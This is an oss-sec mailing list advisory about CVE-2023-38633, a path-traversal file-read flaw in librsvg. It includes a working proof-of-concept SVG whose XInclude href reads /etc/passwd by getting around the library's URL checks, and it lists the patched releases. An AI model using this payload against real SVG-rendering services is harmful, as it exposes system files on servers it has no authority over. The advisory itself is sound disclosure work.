oss-sec mailing list archives
CVE-2023-38633 in librsvg: Arbitrary file read when xinclude href has special characters
From: Alan Coopersmith <alan.coopersmith () oracle com>
Date: Thu, 27 Jul 2023 13:36:17 -0700
I haven't seen this go by yet, so for those who haven't seen it: https://gitlab.gnome.org/GNOME/librsvg/-/issues/996 reports: CVE-2023-38633: Arbitrary file read when xinclude href has special characters This was reported by Zac Sims. <?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude"> <rect width="300" height="300" style="fill:rgb(255,255,255);" /> <text x="10" y="100"><xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
<xi:fallback>file not found</xi:fallback> </xi:include> </text> </svg>This ends up actually including the contents of /etc/passwd, bypassing the checks in UrlResolver::resolve_href().
The above linked bug report provides further analysis and links to merge requests for the fixes. Fixes have been published in new releases of
librsvg for many release trains: 2.56.3 2.55.3 2.54.6 2.52.10 2.50.8 2.48.11 2.46.6 -- -Alan Coopersmith- alan.coopersmith () oracle com Oracle Solaris Engineering - https://blogs.oracle.com/solaris
Current thread:
- CVE-2023-38633 in librsvg: Arbitrary file read when xinclude href has special characters Alan Coopersmith (Jul 27)
- Re: CVE-2023-38633 in librsvg: Arbitrary file read when xinclude href has special characters Alan Coopersmith (Sep 06)